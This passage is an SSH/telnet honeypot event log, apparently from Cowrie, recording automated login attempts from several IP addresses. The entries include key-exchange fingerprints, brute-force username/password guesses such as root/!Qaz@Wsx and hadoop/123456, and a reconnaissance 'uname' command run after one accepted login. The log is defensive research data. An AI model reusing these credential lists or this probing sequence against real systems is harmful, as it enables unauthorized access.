{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T06:56:37.091190Z","src_ip":"212.227.235.229","session":"2ac6cb09d808"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"5b:b1:6b:f2:a6:38:33:10:f1:ff:58:42:15:53:6f:ab","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDYFQJGtBpgjsVKUWBLXirmfNjT60un7+NME4cIKd9tTSGqY4QdmFLd8Mfd+TL4djem9iAVkFxyZUrlpoQXRRAirIUFFKdogrIPnZWnxzkOJKGfjvOfuN94clihigblNV2uJviCFv+QiIef22nNb2+WaUtEGhi9MmBwrrFFojjEQMLzb+6CQTMABWA17uq70tYxopjFldB7pAkSOsj3u00v3So9nIv7sFB/GXGfDII95fmjKYs3cbnGIuYYZqM3aojUlndO5YpDegPMNXijuz9jg35SIVqHxjXM3cZrLrF8CKUAVbaKWN/mJ6ieYnFW528QDx76PU6iX5ee5xd4Q8xJ","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 5b:b1:6b:f2:a6:38:33:10:f1:ff:58:42:15:53:6f:ab","sensor":"my-vps","timestamp":"2025-08-28T06:56:37.298777Z","src_ip":"212.227.235.229","session":"2ac6cb09d808"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"5b:b1:6b:f2:a6:38:33:10:f1:ff:58:42:15:53:6f:ab","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDYFQJGtBpgjsVKUWBLXirmfNjT60un7+NME4cIKd9tTSGqY4QdmFLd8Mfd+TL4djem9iAVkFxyZUrlpoQXRRAirIUFFKdogrIPnZWnxzkOJKGfjvOfuN94clihigblNV2uJviCFv+QiIef22nNb2+WaUtEGhi9MmBwrrFFojjEQMLzb+6CQTMABWA17uq70tYxopjFldB7pAkSOsj3u00v3So9nIv7sFB/GXGfDII95fmjKYs3cbnGIuYYZqM3aojUlndO5YpDegPMNXijuz9jg35SIVqHxjXM3cZrLrF8CKUAVbaKWN/mJ6ieYnFW528QDx76PU6iX5ee5xd4Q8xJ","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T06:56:37.299436Z","src_ip":"212.227.235.229","session":"2ac6cb09d808"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"5b:b1:6b:f2:a6:38:33:10:f1:ff:58:42:15:53:6f:ab","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDYFQJGtBpgjsVKUWBLXirmfNjT60un7+NME4cIKd9tTSGqY4QdmFLd8Mfd+TL4djem9iAVkFxyZUrlpoQXRRAirIUFFKdogrIPnZWnxzkOJKGfjvOfuN94clihigblNV2uJviCFv+QiIef22nNb2+WaUtEGhi9MmBwrrFFojjEQMLzb+6CQTMABWA17uq70tYxopjFldB7pAkSOsj3u00v3So9nIv7sFB/GXGfDII95fmjKYs3cbnGIuYYZqM3aojUlndO5YpDegPMNXijuz9jg35SIVqHxjXM3cZrLrF8CKUAVbaKWN/mJ6ieYnFW528QDx76PU6iX5ee5xd4Q8xJ","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 5b:b1:6b:f2:a6:38:33:10:f1:ff:58:42:15:53:6f:ab","sensor":"my-vps","timestamp":"2025-08-28T06:56:37.403333Z","src_ip":"212.227.235.229","session":"2ac6cb09d808"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"5b:b1:6b:f2:a6:38:33:10:f1:ff:58:42:15:53:6f:ab","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDYFQJGtBpgjsVKUWBLXirmfNjT60un7+NME4cIKd9tTSGqY4QdmFLd8Mfd+TL4djem9iAVkFxyZUrlpoQXRRAirIUFFKdogrIPnZWnxzkOJKGfjvOfuN94clihigblNV2uJviCFv+QiIef22nNb2+WaUtEGhi9MmBwrrFFojjEQMLzb+6CQTMABWA17uq70tYxopjFldB7pAkSOsj3u00v3So9nIv7sFB/GXGfDII95fmjKYs3cbnGIuYYZqM3aojUlndO5YpDegPMNXijuz9jg35SIVqHxjXM3cZrLrF8CKUAVbaKWN/mJ6ieYnFW528QDx76PU6iX5ee5xd4Q8xJ","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T06:56:37.403995Z","src_ip":"212.227.235.229","session":"2ac6cb09d808"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44550,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b44abe56d14","protocol":"ssh","message":"New connection: 212.227.235.229:44550 (1.2.3.4:22) [session: 3b44abe56d14]","sensor":"my-vps","timestamp":"2025-08-28T06:56:41.526804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:56:41.528065Z","src_ip":"212.227.235.229","session":"3b44abe56d14"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:56:41.782227Z","src_ip":"212.227.235.229","session":"3b44abe56d14"}
{"eventid":"cowrie.login.success","username":"root","password":"!Qaz@Wsx","message":"login attempt [root/!Qaz@Wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:56:42.545554Z","src_ip":"212.227.235.229","session":"3b44abe56d14"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:56:43.141264Z","src_ip":"212.227.235.229","session":"3b44abe56d14"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:56:43.141966Z","src_ip":"212.227.235.229","session":"3b44abe56d14"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:56:43.397294Z","src_ip":"212.227.235.229","session":"3b44abe56d14"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:56:43.398416Z","src_ip":"212.227.235.229","session":"3b44abe56d14"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:56:46.988012Z","src_ip":"212.227.235.229","session":"2ac6cb09d808"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44978,"dst_ip":"1.2.3.4","dst_port":22,"session":"f31a05ed39da","protocol":"ssh","message":"New connection: 212.227.125.160:44978 (1.2.3.4:22) [session: f31a05ed39da]","sensor":"my-vps","timestamp":"2025-08-28T06:56:51.355156Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:56:51.356321Z","src_ip":"212.227.125.160","session":"f31a05ed39da"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:56:51.585890Z","src_ip":"212.227.125.160","session":"f31a05ed39da"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456","message":"login attempt [hadoop/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:56:52.258995Z","src_ip":"212.227.125.160","session":"f31a05ed39da"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:56:53.480113Z","src_ip":"212.227.125.160","session":"f31a05ed39da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45424,"dst_ip":"1.2.3.4","dst_port":22,"session":"06e6efca7ebd","protocol":"ssh","message":"New connection: 212.227.235.229:45424 (1.2.3.4:22) [session: 06e6efca7ebd]","sensor":"my-vps","timestamp":"2025-08-28T06:56:57.957933Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:56:57.958879Z","src_ip":"212.227.235.229","session":"06e6efca7ebd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:56:58.216938Z","src_ip":"212.227.235.229","session":"06e6efca7ebd"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456","message":"login attempt [hadoop/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:56:58.993922Z","src_ip":"212.227.235.229","session":"06e6efca7ebd"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:57:00.254201Z","src_ip":"212.227.235.229","session":"06e6efca7ebd"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":42173,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cfa9a9cd9c0","protocol":"ssh","message":"New connection: 80.94.95.15:42173 (1.2.3.4:22) [session: 5cfa9a9cd9c0]","sensor":"my-vps","timestamp":"2025-08-28T06:57:00.281295Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T06:57:00.281897Z","src_ip":"80.94.95.15","session":"5cfa9a9cd9c0"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T06:57:00.374085Z","src_ip":"80.94.95.15","session":"5cfa9a9cd9c0"}
{"eventid":"cowrie.login.failed","username":"user","password":"kaktus","message":"login attempt [user/kaktus] failed","sensor":"my-vps","timestamp":"2025-08-28T06:57:01.010629Z","src_ip":"80.94.95.15","session":"5cfa9a9cd9c0"}
{"eventid":"cowrie.login.failed","username":"user","password":"harder","message":"login attempt [user/harder] failed","sensor":"my-vps","timestamp":"2025-08-28T06:57:02.111015Z","src_ip":"80.94.95.15","session":"5cfa9a9cd9c0"}
{"eventid":"cowrie.login.failed","username":"user","password":"eduard","message":"login attempt [user/eduard] failed","sensor":"my-vps","timestamp":"2025-08-28T06:57:03.211761Z","src_ip":"80.94.95.15","session":"5cfa9a9cd9c0"}
{"eventid":"cowrie.login.failed","username":"user","password":"dylan","message":"login attempt [user/dylan] failed","sensor":"my-vps","timestamp":"2025-08-28T06:57:04.688354Z","src_ip":"80.94.95.15","session":"5cfa9a9cd9c0"}
{"eventid":"cowrie.login.failed","username":"user","password":"dead","message":"login attempt [user/dead] failed","sensor":"my-vps","timestamp":"2025-08-28T06:57:05.780632Z","src_ip":"80.94.95.15","session":"5cfa9a9cd9c0"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:57:06.862069Z","src_ip":"80.94.95.15","session":"5cfa9a9cd9c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41736,"dst_ip":"1.2.3.4","dst_port":22,"session":"78b7b0c6290f","protocol":"ssh","message":"New connection: 212.227.125.160:41736 (1.2.3.4:22) [session: 78b7b0c6290f]","sensor":"my-vps","timestamp":"2025-08-28T06:57:07.637179Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:57:07.638074Z","src_ip":"212.227.125.160","session":"78b7b0c6290f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:57:07.853424Z","src_ip":"212.227.125.160","session":"78b7b0c6290f"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":52952,"dst_ip":"1.2.3.4","dst_port":23,"session":"f79b88a39f4c","protocol":"telnet","message":"New connection: 8.222.212.69:52952 (1.2.3.4:23) [session: f79b88a39f4c]","sensor":"my-vps","timestamp":"2025-08-28T06:57:08.362311Z"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools123","message":"login attempt [tools/tools123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:57:08.500199Z","src_ip":"212.227.125.160","session":"78b7b0c6290f"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:57:09.718048Z","src_ip":"212.227.125.160","session":"78b7b0c6290f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51912,"dst_ip":"1.2.3.4","dst_port":22,"session":"620d3d085662","protocol":"ssh","message":"New connection: 212.227.235.229:51912 (1.2.3.4:22) [session: 620d3d085662]","sensor":"my-vps","timestamp":"2025-08-28T06:57:14.124665Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:57:14.125630Z","src_ip":"212.227.235.229","session":"620d3d085662"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:57:14.371833Z","src_ip":"212.227.235.229","session":"620d3d085662"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools123","message":"login attempt [tools/tools123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:57:15.112715Z","src_ip":"212.227.235.229","session":"620d3d085662"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:57:16.362908Z","src_ip":"212.227.235.229","session":"620d3d085662"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37124,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2eaa7fca34e","protocol":"ssh","message":"New connection: 212.227.125.160:37124 (1.2.3.4:22) [session: e2eaa7fca34e]","sensor":"my-vps","timestamp":"2025-08-28T06:57:24.008655Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:57:24.009628Z","src_ip":"212.227.125.160","session":"e2eaa7fca34e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 